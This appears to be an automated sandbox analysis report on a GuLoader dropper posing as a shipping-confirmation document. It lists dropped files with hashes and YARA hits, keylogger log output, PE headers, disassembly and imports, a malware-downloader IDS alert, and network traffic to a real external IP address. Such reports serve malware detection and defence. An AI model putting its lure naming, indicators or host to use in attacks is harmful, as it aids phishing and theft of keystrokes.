                                                                          Preview:....[.2.0.2.5./.0.1./.1.5. .2.3.:.1.0.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                          Process:C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:dropped
                                                                          Size (bytes):610289
                                                                          Entropy (8bit):7.753054968072418
                                                                          Encrypted:false
                                                                          SSDEEP:12288:UnPdM9EEXsp0807Vhc7PWf/EdNjxwxNkecc9waDhWC8muW:EPdM20/77cbc/Ezs9wgtuW
                                                                          MD5:DD009056ED546D7CB3B75EF74F748CED
                                                                          SHA1:39FA6F07CEAF1D545C02702A18DCACC5C57ACF0A
                                                                          SHA-256:BFE72721AD2C670966F0D1A30AF60B5D697731C31AFDD028EE316D32AB2E4E17
                                                                          SHA-512:E93E2802C0B8DAB4A384BFDB5D54191438E21D1C7F0228C6F92B0382562D9948869F4EF4610D595E8775556197E4AE68F3E9DC35D6E82495CBC8976655A5AB2B
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                          Reputation:low
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@..........................0............@.............................................X............................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...................................rsrc...X...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):25
                                                                          Entropy (8bit):4.0536606896881855
                                                                          Encrypted:false
                                                                          SSDEEP:3:8+dB4WYiTNvn:8AbYiTNvn
                                                                          MD5:08CA75DA54EB4810D18796C97F510A55
                                                                          SHA1:3D9B020193D16E7D0F5392EF7693A6C5C6D2531D
                                                                          SHA-256:E628D2EE9FE054256B42FFDEC449254437949DEB45B13354D515579CE3E0618E
                                                                          SHA-512:46D71D69FDCBF9069E74C1176080637A1356E747FA1A1C852172CF0BB36F44ED7D741EB6DF029F333D690E500462DFC9EDEB8B4EB7BB9642C907B792F30DED9A
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:[Bus Clock]..Gats=Galse..
                                                                          Process:C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1220587
                                                                          Entropy (8bit):3.8799262547847344
                                                                          Encrypted:false
                                                                          SSDEEP:12288:JJ140M8PkL4HmWE4RPakcJNrs6/b09tNLTholiuwnwcS9CR:hs4HmJQbq/Q3pJwcF
                                                                          MD5:78C44CEEA70B9BEBE79F481544FF3BAF
                                                                          SHA1:FBE5188F8BE4D0FB3F46059C2BFA7CDF8FB6EA33
                                                                          SHA-256:9C67F421317720FF09E1F94B307B4F1195242F0AD8A559C15119A9C574AE4025
                                                                          SHA-512:2DE2E7FD49EF97999DE601B06603FF8A66CF7F403499B87AA601082AE3AA20F31A5B7563839991D9CF765B71B4FEBE68BA4F355372DD2DACB6FED11B0419B56C
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nsc44DF.tmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Preview:@.......,...................V...,...............@...........................................................................................................................................................................................................................................G...Y...........(...j...............................................................................................................................b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):12288
                                                                          Entropy (8bit):5.805604762622714
                                                                          Encrypted:false
                                                                          SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                                          MD5:4ADD245D4BA34B04F213409BFE504C07
                                                                          SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                                          SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                                          SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: oXcuapa8Nb, Detection: malicious, Browse
                                                                          • Filename: 2afvzKckLw, Detection: malicious, Browse
                                                                          • Filename: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, Detection: malicious, Browse
                                                                          • Filename: BppG5NgQJB, Detection: malicious, Browse
                                                                          • Filename: x6yDsHJ9tr.exe, Detection: malicious, Browse
                                                                          • Filename: LrBF2Z930N.exe, Detection: malicious, Browse
                                                                          • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                          • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                          • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                          • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):114454
                                                                          Entropy (8bit):1.2519787240577294
                                                                          Encrypted:false
                                                                          SSDEEP:768:RRDt23AKhN87PfNufvVxTfdx5U5Flf6VAETw:YEevVx2h
                                                                          MD5:F85E20AA1A28EEFFC89F744F6B6B67B3
                                                                          SHA1:B61AEF131017C5605647983CE2D55769914BB104
                                                                          SHA-256:C388ED22B7E44C0C3FDD6D064DD070DCA64CEA1E83D6151566641E7438C346ED
                                                                          SHA-512:EA89503F496B30DA5EAA74BB479007BB6B93463B775F16810A4391E79389A219398AC81DCCDD79C3F60E85DF77AA985E405BDF7B477C8F3217ECC3B7460BEE6A
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:...............................m.......................5............}.......t......^..................................................)..........................................;......B.......................................................................*....................3.......s.......................+.+...@=.......O..........................G...................M...........g...................#.........................................................................................................v......................e........n......,...................b.................................e.................Y.......=..........................................................a........j.../.........#..........................`..................................>........\..................................... ..................................................g..R.........................................................................g...............................N....................
                                                                          Process:C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):290864
                                                                          Entropy (8bit):7.663951980002321
                                                                          Encrypted:false
                                                                          SSDEEP:6144:+hJC1Y4BOjiQ5i8Pf8L42QNokpE4RPaMLzcJNrs6EwjcqbPsL4:YJ140M8PkL4HmWE4RPakcJNrs6/b0c
                                                                          MD5:C815E5CE90B126450B64ACD9833308BC
                                                                          SHA1:D814FCB54B440469BF14C8147F4996C59DECB68D
                                                                          SHA-256:B11B281361B8FE3D2FEBB49BE2DF07B72B840EF72C561414B0EE4463F9F105C1
                                                                          SHA-512:D5350295726130257F58257B1E8E9B75A29B1EDBE13C158CA25670031395B55E425B052C52F81C04F9F891D7A2F887F732279587A12154FFB8777E4D25FF56AF
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\eftermodnendes\ringeagt\Garantis131.Sul, Author: Joe Security
                                                                          Preview:......."....................I........]]..o.YY........V.J.......cc...........88..UU...........b.6..........V....i........................7.......\\...................k.e..d................,......i....................]]..........$.............u.......:.......9.....................z..T................[............................../.GG.....................................r........................e..&&&......................OO..................|........ZZ..........BB..^.......!..........``.......s.++.=.'.X..M.]............................&&....\\................"""""........................n....,,,.NNNNN...........E.../..........1........___....y.....~..........:.....................C.fff..............y................ss...6.`````.....>.##..............f.....@@......ee....;.AA...e.......................JJ.PP..........7..............................77....................[.I.....0.".=..X.<.B..SS....................}......>.....e.I..OO..[.............Q......................))...F............c
                                                                          Process:C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):217509
                                                                          Entropy (8bit):4.607869653006634
                                                                          Encrypted:false
                                                                          SSDEEP:3072:b30UseFuILs1fuWP7ZzLFv50l8wQcW0O4lAq0lv9fjV+/z6ClGew3:b0oFuIL6uyZcC1Bli/z6wnw3
                                                                          MD5:4FCD52C1EA5690576379E0739D4CA668
                                                                          SHA1:1F234C97325814923E58D2B59AADED20B01F1246
                                                                          SHA-256:34D7CFC019F7EDDAF2FA1B9555BE427FE6CCC091B07089CCFCB7E1D1F2D5C5B0
                                                                          SHA-512:3D55BF0FE3D6FC00188E02E9C75FCDBCDE5D1C40E8B182057AE1D4FD25D4B2ADDD9B2CF7F9955095A0955F137DA8EFAD8D979D0A789E7480884FD3979BBE6D8D
                                                                          Malicious:false
                                                                          Preview:.....mmmm.........GGG......................W.....====..999999.....44.........*..........uu..................q...........NNN.,.Q..==.............r...6.........$..................g..........&&.uu............._...................;......................9...m.......^^^^^.......m..........Q........ee.....L...CC.................s.....................{{....(...............llll.............00......................................jj.bbb..''....-.s..............................QQQ......w.X.....................o...Z...................CC.................@@............'...C.....wwww..c..gg........NN..........pp.....]].PP........~...........gggg............SS..dd...==......DD..................q............zz.................55....V..........L.^.a...R....H...G............l........H..........22..............^.bbb....................T....I...{.............^^.BBBB...V........qqqq.?...............u.MM.-............b.||......ww.........X................<<.WW..mmmm.......o.`....O..J...................W.....
                                                                          Process:C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):310550
                                                                          Entropy (8bit):1.2527719188567612
                                                                          Encrypted:false
                                                                          SSDEEP:1536:CfvXvtPDO00Rz1DXs2sASdJwvyfnpZkL:klDO0MDRS9k
                                                                          MD5:72FA348549D0BD9CE66E5F3EBA54DF3A
                                                                          SHA1:D5B4797D07374226CD8173964DF8753F4ABB9E6E
                                                                          SHA-256:7F24A44B47D2C036AACE03D4F5EBEA053CED6ED06CE01ED70E6FD8AEE8211CC9
                                                                          SHA-512:D375FC28BBA68A52E4C2CB97A9ADA416D38F29B21004F1853DC14ACF28CDE2A802D51FD66901D993DAA58E50D8C87FD2A8827482633B0B9874FF64F8442492B1
                                                                          Malicious:false
                                                                          Preview:...e......J.........................................................................................................................................J........K...............................L...........................v.............................................................................%..:...................F.................................................................|...1.....A..................................1........d...................J..X..........................x..............x..."..........................`.........................................................[...................t.......................2..............................................................................t....................................................$...\...............!..........................|....................................r.............................W.............................................X.....................................................q.................
                                                                          Process:C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8589934592.000000
                                                                          Category:dropped
                                                                          Size (bytes):267655
                                                                          Entropy (8bit):1.2559804952290619
                                                                          Encrypted:false
                                                                          SSDEEP:768:HbUhrUe+zlum+LaFrAX40edupFSsZVfeTkVhbbCGx6+ZOoJrrSVlRM9k8rZgQWze:ICFg/VP97pb14sZg
                                                                          MD5:F6A4342C9271CFFEF29695EEA330941E
                                                                          SHA1:291ABCFA507BA730832511E5F47EAA2CB4DFABBD
                                                                          SHA-256:605B31C886C5989625152D1CD58BCACF2827DE36CC67B5D94D6B425955CEDBA6
                                                                          SHA-512:D839DD8E3D74B7500F32318403BEAC3BA2DA83C48EF21555E78D368AA0404AC750DB1DD7EB8A7196DA32FBE3D880B66ED3166A39F17D8D0D13C9C4B19435530C
                                                                          Malicious:false
                                                                          Preview:...........T.........'......'....A........s.................@.....................................................................N......M...........^................................t............Q.......R...r.........................................................6..................Q...I........<....d......................................................................................B.....p............/.........................................."...b..@...................Q...........!.................................f............................`.................d.................................L.........f...o....................................................................................s...................i.....................S.b..A...............................................................U..o................................................................../...............................................................................................`..................
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.753054968072418
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          File size:610'289 bytes
                                                                          MD5:dd009056ed546d7cb3b75ef74f748ced
                                                                          SHA1:39fa6f07ceaf1d545c02702a18dcacc5c57acf0a
                                                                          SHA256:bfe72721ad2c670966f0d1a30af60b5d697731c31afdd028ee316d32ab2e4e17
                                                                          SHA512:e93e2802c0b8dab4a384bfdb5d54191438e21d1c7f0228c6f92b0382562d9948869f4ef4610d595e8775556197e4ae68f3e9dc35d6e82495cbc8976655a5ab2b
                                                                          SSDEEP:12288:UnPdM9EEXsp0807Vhc7PWf/EdNjxwxNkecc9waDhWC8muW:EPdM20/77cbc/Ezs9wgtuW
                                                                          TLSH:70D4F1E1F114C2B6E71F4E34E6B269F01D40BC79C1E1483B5390BE9EB47266289AB51F
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....
                                                                          Icon Hash:4571753721719a8d
                                                                          Entrypoint:0x403645
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                                          Instruction
                                                                          sub esp, 000003F8h
                                                                          push ebp
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          pop edi
                                                                          xor ebp, ebp
                                                                          push 00008001h
                                                                          mov dword ptr [esp+20h], ebp
                                                                          mov dword ptr [esp+18h], 0040A230h
                                                                          mov dword ptr [esp+14h], ebp
                                                                          call dword ptr [004080A0h]
                                                                          mov esi, dword ptr [004080A4h]
                                                                          lea eax, dword ptr [esp+34h]
                                                                          push eax
                                                                          mov dword ptr [esp+4Ch], ebp
                                                                          mov dword ptr [esp+0000014Ch], ebp
                                                                          mov dword ptr [esp+00000150h], ebp
                                                                          mov dword ptr [esp+38h], 0000011Ch
                                                                          call esi
                                                                          test eax, eax
                                                                          jne 00007FD49862734Ah
                                                                          lea eax, dword ptr [esp+34h]
                                                                          mov dword ptr [esp+34h], 00000114h
                                                                          push eax
                                                                          call esi
                                                                          mov ax, word ptr [esp+48h]
                                                                          mov ecx, dword ptr [esp+62h]
                                                                          sub ax, 00000053h
                                                                          add ecx, FFFFFFD0h
                                                                          neg ax
                                                                          sbb eax, eax
                                                                          mov byte ptr [esp+0000014Eh], 00000004h
                                                                          not eax
                                                                          and eax, ecx
                                                                          mov word ptr [esp+00000148h], ax
                                                                          cmp dword ptr [esp+38h], 0Ah
                                                                          jnc 00007FD498627318h
                                                                          and word ptr [esp+42h], 0000h
                                                                          mov eax, dword ptr [esp+40h]
                                                                          movzx ecx, byte ptr [esp+3Ch]
                                                                          mov dword ptr [00429B18h], eax
                                                                          xor eax, eax
                                                                          mov ah, byte ptr [esp+38h]
                                                                          movzx eax, ax
                                                                          or eax, ecx
                                                                          xor ecx, ecx
                                                                          mov ch, byte ptr [esp+00000148h]
                                                                          movzx ecx, cx
                                                                          shl eax, 10h
                                                                          or eax, ecx
                                                                          movzx ecx, byte ptr [esp+0000004Eh]
                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x18858.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x66b70x6800e65344ac983813901119e185754ec24eFalse0.6607196514423077data6.4378696011937135IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xa0000x1fb780x600caa377d001cfc3215a3edff6d7702132False0.5091145833333334data4.126209888385862IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x4a0000x188580x18a0073bbe3fdd1585fbd610b24874590b455False0.22416322969543148data5.2980000367452575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x4a4180x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.14908908079971608
                                                                          RT_ICON0x5ac400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.27520746887966807
                                                                          RT_ICON0x5d1e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.3553001876172608
                                                                          RT_ICON0x5e2900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.48667377398720685
                                                                          RT_ICON0x5f1380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.43934426229508194
                                                                          RT_ICON0x5fac00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.569043321299639
                                                                          RT_ICON0x603680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.5552995391705069
                                                                          RT_ICON0x60a300x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.18841463414634146
                                                                          RT_ICON0x610980x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4869942196531792
                                                                          RT_ICON0x616000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.598404255319149
                                                                          RT_ICON0x61a680x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.26344086021505375
                                                                          RT_ICON0x61d500x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 384EnglishUnited States0.3094262295081967
                                                                          RT_ICON0x61f380x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.42905405405405406
                                                                          RT_DIALOG0x620600x100dataEnglishUnited States0.5234375
                                                                          RT_DIALOG0x621600x11cdataEnglishUnited States0.6056338028169014
                                                                          RT_DIALOG0x622800x60dataEnglishUnited States0.7291666666666666
                                                                          RT_GROUP_ICON0x622e00xbcdataEnglishUnited States0.601063829787234
                                                                          RT_VERSION0x623a00x174dataEnglishUnited States0.5860215053763441
                                                                          RT_MANIFEST0x625180x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                          DLLImport
                                                                          ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                          SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                          ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                          COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                          USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                          GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                          KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2025-01-16T05:10:54.309320+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449737109.99.162.14443TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 16, 2025 05:10:52.968060970 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:52.968101978 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:52.968164921 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:52.983092070 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:52.983133078 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:53.999577999 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:53.999649048 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.079523087 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.079557896 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.080610991 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.080679893 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.086669922 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.131337881 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.309278011 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.309340954 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.309350967 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.309371948 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.309403896 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.309451103 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.309463978 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.309508085 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.426955938 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.427170038 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.427897930 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.427989006 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.428915977 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.429099083 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.429697037 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.429883003 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.549184084 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.549374104 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.549885035 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.549972057 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.550600052 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.550673008 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.550729990 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.550806046 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.551511049 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.551582098 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.552393913 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.552462101 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.553205013 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.553282976 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.667556047 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.667730093 CET44349737109.99.162.14192.168.2.4
